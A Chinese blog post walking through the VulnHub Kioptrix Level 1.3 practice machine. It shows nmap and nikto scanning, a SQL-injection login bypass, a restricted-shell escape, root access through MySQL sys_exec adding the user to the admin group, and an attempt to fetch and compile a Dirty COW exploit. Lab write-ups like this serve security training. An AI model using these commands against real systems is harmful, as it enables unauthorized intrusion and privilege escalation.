PJzhang:vulnhub靶机Kioptrix系列KIOPTRIX:LEVEL 1.3

猫宁~~~

 

地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

打开vmwareworkstation---创建新的虚拟机---稍后安装操作系统---操作系统和版本都是其他---完成---编辑虚拟机设置---删除原有硬盘,添加新硬盘---使用现有虚拟硬盘---选择Kioptrix4_vmware.vmdk---网络模式为桥接

kali linux IP 192.168.100.6

nmap 192.168.100.0/24

发现靶机的IP 192.168.100.19

nmap -sV -p1-65535 192.168.100.19

22/tcp  open  ssh         

OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

80/tcp  open  http        

Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)

139/tcp open  netbios-ssn 

Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp open  netbios-ssn 

Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

访问http://192.168.100.19/,有登录框

访问http://192.168.100.19/john/,可以跳转登录框,用户名john

nikto -h 192.168.100.19

john,'or '1'='1,成功登录,显示控制面板帐户密码john,MyNameIsJohn

python -c 'import pty;pty.spawn("/bin/bash")'

被禁止使用

echo os.system("/bin/bash")

成功进入正常交互界面

john@Kioptrix4

cd /var/www

cat checklogin.php

发现数据库用户名密码为空

mysql -uroot -p

select sys_exec("usermod -aG admin john");

exit

sudo su root,输入密码MyNameIsJohn

成为root帐户

脏牛提权思路

uname -a 

Linux Kioptrix4 2.6.24-24-server

searchsploit dirty

https://www.exploit-db.com/exploits/40839

40839.c

cp /usr/share/exploitdb/exploits/linux/local/40839.c /root/

python -m SimpleHTTPServer 6666

cd /tmp

wget http://192.168.100.6:6666/40839.c

Linux Kernel 2.6.22<3.9 

gcc -pthread 40839.c -o muma -lcryp

./muma

可惜缺少,gcc,pentium-builder

 

posted @ 2020-09-08 01:23  PJzhang  阅读(414)  评论(0编辑  收藏  举报